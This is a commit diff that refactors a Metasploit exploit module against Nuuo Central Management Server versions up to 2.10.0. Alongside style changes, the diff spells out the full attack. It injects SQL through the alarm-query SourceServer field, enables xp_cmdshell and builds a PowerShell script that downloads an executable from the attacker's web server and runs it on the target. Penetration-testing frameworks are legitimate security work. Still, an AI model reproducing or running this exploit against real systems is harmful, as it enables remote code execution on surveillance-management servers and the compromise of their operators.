Minor updates

jrobles-r7 · jrobles-r7 · commit 73048edd9704 · 2019-02-19T12:26:31.000-06:00
exploit:nuuo_cms_sqli
diff --git a/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb b/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Nuuo Central Management Authenticated SQL Server SQLi",
+      'Name'           => 'Nuuo Central Management Authenticated SQL Server SQLi',
       'Description'    => %q{
       The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
       This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
@@ -42,7 +42,7 @@ def initialize(info={})
           [ 'Nuuo Central Management Server <= v2.10.0', {} ],
         ],
       'Privileged'     => false,                  # we run as NETWORK_SERVICE
-      'DisclosureDate' => "Oct 11 2018",
+      'DisclosureDate' => 'Oct 11 2018',
       'DefaultTarget'  => 0))
     register_options(
       [
@@ -53,7 +53,7 @@ def initialize(info={})
 
 
   def inject_sql(sql, final = false)
-    sql = ["GETOPENALARM","DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
+    sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
     if final
       nucs_send_msg_async(sql)
     else
@@ -63,12 +63,11 @@ def inject_sql(sql, final = false)
 
   # Handle incoming requests from the server
   def on_request_uri(cli, request)
-    #print_status("on_request_uri called: #{request.inspect}")
-    if (not @pl)
+    unless @pl
       print_error("A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_good("Sending the payload to CMS...")
+    print_good('Sending the payload to CMS...')
     @exe_sent = true
     send_response(cli, @pl)
   end
@@ -85,28 +84,21 @@ def create_hex_cmd(cmd)
   def exploit
     nucs_login
 
-    if @nucs_session == nil
-      fail_with(Failure::Unknown, "Failed to login to Nuuo CMS")
+    unless @nucs_session
+      fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
     end
 
-    downfile = rand_text_alpha(8+rand(8))
     @pl = generate_payload_exe
     @exe_sent = false
-    resource_uri = '/' + downfile
+    resource_uri = "/#{rand_text_alpha(8..16)}"
 
     #do not use SSL
     if datastore['SSL']
       ssl_restore = true
       datastore['SSL'] = false
     end
 
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-      srv_host = Rex::Socket.source_address(rhost)
-    else
-      srv_host = datastore['SRVHOST']
-    end
-
-    service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+    service_url = "http://#{srvhost_addr}:#{srvport}#{resource_uri}"
     print_status("Starting up our web service on #{service_url} ...")
     start_service({'Uri' => {
       'Proc' => Proc.new { |cli, req|
@@ -120,24 +112,29 @@ def exploit
     # we need to roll our own here instead of using the MSSQL mixins
     # (tried that and it doesn't work)
     print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
-    filename = rand_text_alpha_lower(rand(8) + 2) + ".exe"
-    download_pl = %{xp_cmdshell 'cd C:\\windows\\temp\\ && echo $storageDir=$pwd > wget.ps1 && echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && echo $url = "#{service_url}" >> wget.ps1 && echo $file = "#{filename}" >> wget.ps1 && echo $webclient.DownloadFile($url,$file) >> wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
-
-    print_status("Injecting PowerShell payload")
+    filename = "#{rand_text_alpha_lower(8..10)}.exe"
+    download_pl = %{xp_cmdshell }
+    download_pl << %{'cd C:\\windows\\temp\\ && }
+    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
+    download_pl << %{echo $url = "#{service_url}" >> wget.ps1 && }
+    download_pl << %{echo $file = "#{filename}" >> wget.ps1 && }
+    download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
+    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
+
+    print_status('Injecting PowerShell payload')
     inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
 
     counter = 0
     while (not @exe_sent || counter >= datastore['SLEEP'])
-      sleep 1
+      Rex.sleep(1)
       counter += 1
     end
 
-    if not @exe_sent
-      fail_with(Failure::Unknown, "Could not get CMS to download the payload")
+    unless @exe_sent
+      fail_with(Failure::Unknown, 'Could not get CMS to download the payload')
     end
 
-    print_status("Executing shell...")
+    print_status('Executing shell...')
     inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{filename}\""), true)
-    handler
   end
 end
